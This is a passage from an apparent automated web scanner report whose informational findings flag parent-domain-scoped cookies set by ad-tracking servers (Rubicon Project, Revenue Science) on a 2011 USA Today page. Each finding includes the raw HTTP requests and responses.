Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; cd=false; ruid=154dab7990adc1d6f3372c12^10^1304954976^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=12590^2&13549^1&5032^2; csi2=3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Mon, 09-May-2011 16:36:57 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 16:36:57 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1&5032^3; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=58982; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3187892.js^1^1304955417^1304955417&3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 15:36:57 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 1535

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<script type="text/javascript">
rubicon_cb = Math.random(); rubicon_rurl = docum
...[SNIP]...

10.37. http://pix04.revsci.net/D08734/a1/0/3/0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fti.com%253Fscore%253D000%2526zip%253D%2526byear1%253D%2526sex1%253D%2526ts1%253D%2526byear2%253D%2526sex2%253D%2526ts2%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; udm_0=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; rsiPus_GcbX="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"; rsi_us_1000000="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"; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; rtc_4-db=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:21 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:21 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:20 GMT
Content-Length: 593

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs = ['D08734_72087','D08734_72092','D08734_72131','D08734_72639','D08734_72674','D08734_72685','D08734_72132','D08734_72078','D08734_72122'
...[SNIP]...

10.38. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /J06575/a4/0/0/pcx.js?csid=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; udm_0=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; rsiPus_GcbX="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"; rsi_us_1000000="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"; rsi_segs_1000000=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; rtc_8DRJ=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; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:14 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:13 GMT
Content-Length: 939

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','J06575_10245','J06575_10396','D08734_72078','J06575_50073','J06575_50240','J06575_50735','J06575_50807','J06575_50822'];
...[SNIP]...

10.39. http://pix04.revsci.net/J06575/b3/0/3/1003161/235941171.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1003161/235941171.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1003161/235941171.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_gNkk=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; udm_0=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; 
rsiPus_GcbX="MLsXrqEO5ihr4JB0esFCP3iNF+pqmr69ENWrChMuiN+dmZss5tWSaGYzfZrs4FkB8vHaExBOdq4FjNOXBUu39W/3K2EuxA2rLiiq5uEzbhBp2qqHLka+ldHHpySEQN7Ig6ZX2s1Xts6k3/V+F1BVNaX7P2AMt0j6s7SVkIqtY6fBmuqDg3HiDPDRsFu8LYGpdAgFuZrn7788WLSfiPN4FcsWpCManqMes4eDphzgluz0J7T/7NL09GWQZKgq0h2UqnrAalLP4GpQ2z6NoJmqhjf8ll+bI1mb+2NJpMp3lsbhQW6smYNRkIcBnGSsjC6V8lHV22qN0wsd7pUjrGcn2MZyDk4pHLi3HPlqzfwOFLKkUZX5pylobtQ4XT7CPkVynIhqs2Jdqx6Qbv+DVlcJEcLKaGs26CcQXDhIjPrjQmHNTw104A6YB2yPj9aadbsR9G2g+Sx1IMWC03cSleVUYqmsonOsNwBq4IYZ0iEAxN1kj79GMm/TFvViob6tBGl9piggG1ojpl++EI4CZ/DO72bnJ5uiK6A+hD9jowvMcmzWV7pm2A+BZXOctz9mBcFlA1NhVrVlT54nZulBkGghmR6LfWnx7wRhTDuJYLIL9CjgkLULZ5OwAnDvGtd8c9/IcoSF7rvvCCwxXrXbNkbJA5UJXZiQQ32aGD42CB8j4Uuicv5NhrCu90msLuL0yXPFEkF+ghJXl4UoCPpQReyKPwLxU7P8scUESOUmDQbJ26zmYoM5EYK5HRM13xlFLDjmN3gr3gzLy3PBXRfK/0inM3mgODaJYIQsP4tG3dxQXtc5BzlJZExi106qBh3X8ZgtVrG+Lsw/MFccxeVYnXDkPkatfVNHemuSBEnlJdlwJ7HaraMYTm4mdXxBXuNRVT1qtXz/N4fX76mCnHZapZ8HwTns8rRrVf85AMpSS1M+G68+RoH70ohcdXqH83XdOwulC23J/LnyGSVNe7uFY075AoD/k5/OVIoNr6nsjen9TP6PMT4mikP8tgoCsDB1P2MYAQIhWsgnQghE6D5W6j3EAllSXGbQxYfklk9PQ5HF/mqinW6N2HQc"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_gNkk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP1409BuHIMpjax3xDh/u5UG2vMqKTmRn5okelSXvknuZNZnDfOdzd0q7tfEV6W8KZgxAU1zJYbo4ySeJozi5LFmkkf+4Y6bYkWV1SZizgBMzp3EcFgE6G017VVW6p40CmQyH3jOB6M3uOveMeh2iY1ZBv1vMKSAJATDcXxMRze99i26Jb5EA9ZvBUBQCOLNlZdc1PBr590JxMxK3kemOgUYxWkvCQzvRoZGOhKIU2nYFQXpcFUnxOd7CqAwPNPRcsaqmqd5bH88hbVLgU4/pNIA5yuEJcIPeeGg9+bx5k/IfrFHRjft0ZIZ6+a8LvbP1F9f20smeVrZaOl7PWZnEwLjR8bSow8IznBeM4kH0Wps6j79bZjGkjO9FAdDgoOcv54zgmd74nlmcHZjx6RErrrC/34fPQ0fszJywMxzzQnWrshsE4MUOKoplfl+lTQ4MhWXJ+Yrt0vZS3/S4XoeqXFwxoj4lV6OnNa8UY1pEUlhONk+RELYIM93uJhP1fFj9rXET0X3Q38/0NNfnQ9iEUbhNC336gzi4gveVg2HsUq6Fymuu/jUVOVz5D6uR3kKA0uMOJte/TrlIJB9uKJTB3Hkj+OteqSnSo=; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:36:55 GMT; Path=/
Set-Cookie: NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf417&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 15:36:55 GMT; Path=/
Set-Cookie: rtc_-pbG=MLvn9jM1Jhpr5oaeFy5cQLrcDcgxJTbyaQGzwLZBotunayc2Fw/K4guEx48AnknPEndoby22cGHsdFck1iBn3DUobt55rCByo31GJyETeLJl0qvf6Jn2sxG2z0iT2bbcjJrHe8GBksW4qcll5AeaXjmGUDbRWU08YZg4edF2cBe9DspCxhQ7361ZfEotlSYP+MqBfL/w57DfCdIuJhyfxWDC+F4W0x32WtybJIRC8CLSlbxi3CC7anzdModTvAzrQfv7i4yJ4tfv23hElzRAo45NzalLx0pI92HjAlvLltXQMEeD59j8HSg5zMzrXkbxPGkDuQO8CD5Uy0X440+GhUuEBlTuXncKpo59or+teixmWGkw4h82xTsJxVA32RlmPlxfLd0DPboL+ScpDqJ7EyCMxiPZjPOZSZb/P18d0B6dPfXACkwW2b7JGqZgtJefS8MvIIRVOAWyGKSddY53IBjTDonVRQtAhow+gjBCkr32CoZhiC2o7W53iumA5JAaEKemP4CuriZ3Oh92wceTFssmiHV03P3TnzqwiMvWyGZOLcS0b36BgNTGDP/oHEgI419GHyNYPYePnsZhRU1jkIemN9OP89YbLzetkOaBNGBt72K+i32KTgFnJgkzRmDcwHADuX26Np6HbpwBpsafN0Td8Ege83IpcLfdCWoH/FOES7/sgvItqGMQtpNCesMiY1/hRPOhuADgEqQtp5XbMpu7Sw9desmqxa5M111GnRnmop62u913vIbogl+ZCoarCoWnW2EKAnaKevDI9CtQiAnPFAcM5XjabtRUvhL/d4fIh8imLNMmzGIfpvWHViSKdYGbIHfNIJWraMC4Vahh9asGqff/FFdlJKXDuHnrmiBy7VCK4q0bmyQiOi23Mbp4rMJ7ZFfExGjh0Deg21XrgVEJygAodlMrUFsYh3x+JL6tM82EyxlrjwnPSOPUficZAt2qOvCpWC4d70ONc6DbRXPel2qVWr9R4NR8spx21DQ329eEMe+a453iMV59kioeuCH7mnuTVCY0BzVfb8yQMpXNmGdq8018efv6cy0UrgNLG4Vvjwd577Jg6h+lwSUDxcDbZmAkDmKadjdnDBljgFfsyAsOrNyuDxbJ8TdkZR9gCAtjvsiBzxEVmOrYT6HzTeMLPHrrCPn/1PB0XdhHCeOuIM86Wd1eiYbwPVZOGYoxestkxrwvlBWmqS4zqiJgxGtklz6N9a8yWObB9QeQjynHLDznE3of6mhDRuDmkgGSe0nOe1faUBKdQj7BlaoONO99Gh3ocsQdQ6RyGiPqI42toAtkHfnwxlmtICBtRaKNsHXLNHetdA+4dp7vxXQ5tu/2hEFKF66SpSaQzQl8TB5m7kte9CE3/B32F347rQ4DCFhYj24E4ZyjUYbpe0M+kBzn/QykOyL/w0irDgy6ZQt/u+a1DUBqXRV0/AJO6NnbAxb2eDhLttfyzv258JjuenKMZ5xPt3XAFLN1oSvz6mF7fh50GXHUdoEQgkSBcZ1PS+wIfJy105Aol0wmkUqPh+kfoC4g82jad8JgHmsdZYx5FOIFhoBZb+snjaACRtXREaWla+3A8eufLP7nR7KLQvyYASC7SpnFhReJFBeehSPWU+4l2YWu2IunhD73tvQqrqM7UaWZW5R9IxXZ6BE+hyLrdBoYsxr5qgsF3QHqO2E6n0mUTNwl0lx9cFq7moVZ2JSzSIqGz8wv2TOVDrWCtgahQ4AuqpA7rev3wwCJJWC95V2UKuatoLe7dfcQ+Denb480wEG/t0RgjmDcYpnL90BoFiSV64XacUbSb6smN2yRmAHTsLTLO0QQnvg5vKkgJRJTsJ9hI4mqRmETR1BUZBdR48YLqpyeBqmK4NH5NH2LRq0bdNdk2U0gw4eAFmkAPgZUmniQzEOz; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:36:55 GMT; Path=/
X-Proc-ms: 5
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:54 GMT
Content-Length: 939

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','J06575_10245','J06575_10396','D08734_72078','J06575_50073','J06575_50240','J06575_50735','J06575_50807','J06575_50822'];
...[SNIP]...

10.40. http://pix04.revsci.net/J06575/b3/0/3/1003161/498787488.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1003161/498787488.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1003161/498787488.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; udm_0=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; rsiPus_GcbX="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"; rsi_us_1000000="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"; rsi_segs_1000000=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; rtc_8DRJ=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; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_8DRJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:17 GMT; Path=/
Set-Cookie: NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf469&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 15:38:17 GMT; Path=/
Set-Cookie: rtc_Wrpy=MLvn9jM1Jgpr54aeixlPU0iJzD/A1gw/s7z5FPHjTbcjQe6SyjZfNBHlcl0kJ6xb7KxXS0n/wkRC4loA/0F2wkRHZcOAJEq4Dwzt2Om/1LFFe33wUlIYHWgk3JIf+57YTIrZsByUWltzFrRLWQkJwcRM8WAjEeY4ROXqVRqWqlFCk3HzeZvB7UqDKiMm+em65LEdFCubQva+uhYCU4TAdQsM9NhX+ug+P8ELz2+3GiBBzM1wCymg8+GPH7Y69+xviE6Hqdz7ujIwlbK5VxRJUDXsPScW0OuLen2n5XNIVQWV0a6zZscEKSvJFJ+qcEq4+Z9S+ATaANDLtiqSIrA0MATfpgfCqefcfJ5CLtyChbBOQcNQdYq/ZTXHQ2nKTygG5ksEGSLhhMLTH3nLtfSmf7myMaOLY9aJ02OHl/Fu6Y2wQS84P004/LHAfRc/BEHwKgDZY8E4JJEL71uMwA2eeEdPVYKPG/DduFctll24uU8j2YMNsWENRh4hK5IbB0czI2gWw5thigBcBZIP3XJrVHNnhsObnvvXwCKWWfWdYI3v4TRgyMWKw6d8zcNUriJHuzJ6gN4inlSjVhNBgUR06cCYuTzRv8kU21/Nb5c0ZNbuKLudEWUgq1+Mw5po5VTwWXV0xjFGISH481xxkQrS9f+z4zfknHQSyR966h01FYMsS7zsQtcKlrarNO/PXZK/VVXoeRIalnaoFkvriwrBt9uojqEElV6GOWaCOj9t8u2MX6+ewAiFR8qEF4hCbHQN2w3i7zZxx9jglR+zktHHdI+AaME6nwVOuSWRSMmbBOJQiBGVEKcZZtrixm6A0EkvkXGQhi1mkiDJt28P6lC1YPWnqEjsa1VFxuyj6OhVtpRJH+e2y6R4/cnzJ+CfcLnbecp3jLkBN3A9WKkj160OlWZ6bQrrtnaiNyLK+hjDarrW1/e7DkcyYpLMH7VZ0PoS679JljmXMuDgV63vGcd/l2Xeq07wDl5+804DPNFxxXEWxZK2JxenUyorOZ05lAucMiUYnwDH43x2r3zq4+jzvmUOijuNnDDQC6c2U37Xp4k3g6we4z0Ry3aft2vhGeNZfdQa6KWZJbHpsiIPOCcIXMd7rRsTytymDxbBcSdJSOF12B9Pjw5Zd4nETw83mqHLJNXb+avDtVTPJTZvtMw/WF863sU5PyifACD+WfVm7plRes9cpmKCPcJQ7KvRISbVPTZwwZPbZ+ibDRrmqQ75C3n12yoLgcMTFwwpUXIE8ayLlistW77NupnYkEPzdtEpAoN9Gh3vRGfHy0oQz19wzUQqJlA28pDJ1tX/7iOBCPg6ZY5H+poLDVjrVtXfWnmVV69M+2ceRBwsL9kP8Sh4kd0vsFLne73RkEScWjpHV7/ppEg88FcDKahaMhEZyiRDsKA570XuyQw+UqP5VTXr4GySHBYP6zLT3+/tCziDDi6NClG6rdihdMlrm4QYe4xpq3G